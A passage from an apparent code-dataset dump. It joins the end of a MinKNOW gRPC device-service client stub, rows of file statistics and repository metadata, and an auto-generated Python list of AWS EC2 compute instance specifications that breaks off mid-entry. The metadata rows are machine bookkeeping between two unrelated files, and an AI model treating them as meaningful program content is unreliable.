minknow.rpc.device_pb2.SetUserSpecifiedProductCodeRequest,
minknow.rpc.device_pb2.SetUserSpecifiedProductCodeResponse,
)
self.get_channels_layout = grpclib.client.UnaryUnaryMethod(
channel,
'/ont.rpc.device.DeviceService/get_channels_layout',
minknow.rpc.device_pb2.GetChannelsLayoutRequest,
minknow.rpc.device_pb2.GetChannelsLayoutResponse,
)
| 47.748387 | 212 | 0.693555 | 732 | 7,401 | 6.760929 | 0.112022 | 0.118206 | 0.158416 | 0.18428 | 0.91271 | 0.88725 | 0.847444 | 0.764397 | 0.738331 | 0.601334 | 0 | 0.008859 | 0.222132 | 7,401 | 154 | 213 | 48.058442 | 0.85079 | 0.015809 | 0 | 0.533333 | 1 | 0.059259 | 0.246703 | 0.245604 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014815 | false | 0.059259 | 0.059259 | 0.007407 | 0.096296 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
515bd2c59887c6e54f3f08fb3fa3b64a949e5974 | 119,786 | py | Python | ec2_compare/internal/instance_type/c.py | weldpua2008/aws.ec2.compare | 5149fc4c7cb42f4d7df1930ed8a06750155fe578 | [
"Apache-2.0"
] | null | null | null | ec2_compare/internal/instance_type/c.py | weldpua2008/aws.ec2.compare | 5149fc4c7cb42f4d7df1930ed8a06750155fe578 | [
"Apache-2.0"
] | null | null | null | ec2_compare/internal/instance_type/c.py | weldpua2008/aws.ec2.compare | 5149fc4c7cb42f4d7df1930ed8a06750155fe578 | [
"Apache-2.0"
] | 1 | 2021-12-15T11:58:22.000Z | 2021-12-15T11:58:22.000Z |
# Automatically generated
# pylint: disable=all
get = [{'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 1, 'DefaultCores': 1, 'DefaultThreadsPerCore': 1, 'ValidCores': [1], 'ValidThreadsPerCore': [1], 'SizeInMiB': 2048, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 2, 'Ipv4AddressesPerInterface': 4, 'Ipv6AddressesPerInterface': 4, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6g.medium', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 1, 'DefaultCores': 1, 'DefaultThreadsPerCore': 1, 'ValidCores': [1], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 2048}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 2, 'Ipv4AddressesPerInterface': 4, 'Ipv6AddressesPerInterface': 4, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 1, 'DefaultCores': 1, 'DefaultThreadsPerCore': 1, 'ValidCores': [1], 'ValidThreadsPerCore': [1], 'SizeInMiB': 2048, 'TotalSizeInGB': 59, 'Disks': [{'SizeInGB': 59, 'Count': 1, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 2, 'Ipv4AddressesPerInterface': 4, 'Ipv6AddressesPerInterface': 4, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6gd.medium', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 1, 'DefaultCores': 1, 'DefaultThreadsPerCore': 1, 'ValidCores': [1], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 2048}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 59, 'Disks': [{'SizeInGB': 59, 'Count': 1, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 2, 'Ipv4AddressesPerInterface': 4, 'Ipv6AddressesPerInterface': 4, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['i386', 'x86_64'], 'DefaultVCpus': 2, 'DefaultCores': 2, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1], 'SizeInMiB': 1740, 'TotalSizeInGB': 350, 'Disks': [{'SizeInGB': 350, 'Count': 1, 'Type': 'hdd'}], 'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'unsupported', 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 2, 'Ipv4AddressesPerInterface': 6, 'Ipv6AddressesPerInterface': 0, 'Ipv6Supported': False, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 'c1.medium', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['i386', 'x86_64']}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 2, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 1740}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 350, 'Disks': [{'SizeInGB': 350, 'Count': 1, 'Type': 'hdd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 2, 'Ipv4AddressesPerInterface': 6, 'Ipv6AddressesPerInterface': 0, 'Ipv6Supported': False, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['i386', 'x86_64'], 'SustainedClockSpeedInGhz': 2.8, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 3840, 'TotalSizeInGB': 32, 'Disks': [{'SizeInGB': 16, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c3.large', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['i386', 'x86_64'], 'SustainedClockSpeedInGhz': 2.8}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 3840}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 32, 'Disks': [{'SizeInGB': 16, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 3840, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 3840}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 4096, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 4096}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 4096, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5a.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 4096}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 4096, 'TotalSizeInGB': 75, 'Disks': [{'SizeInGB': 75, 'Count': 1, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5ad.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 4096}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 75, 'Disks': [{'SizeInGB': 75, 'Count': 1, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 4096, 'TotalSizeInGB': 50, 'Disks': [{'SizeInGB': 50, 'Count': 1, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 4096}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 50, 'Disks': [{'SizeInGB': 50, 'Count': 1, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 5376, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 25 Gigabit', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5n.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 5376}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 25 Gigabit', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 2, 'DefaultCores': 2, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1], 'SizeInMiB': 4096, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6g.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 2, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 4096}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 2, 'DefaultCores': 2, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1], 'SizeInMiB': 4096, 'TotalSizeInGB': 118, 'Disks': [{'SizeInGB': 118, 'Count': 1, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6gd.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 2, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 4096}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 118, 'Disks': [{'SizeInGB': 118, 'Count': 1, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.8, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 7680, 'TotalSizeInGB': 80, 'Disks': [{'SizeInGB': 40, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c3.xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.8}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 7680}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 80, 'Disks': [{'SizeInGB': 40, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 7680, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 7680}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 8192, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 8192, 'EbsOptimizedSupport': 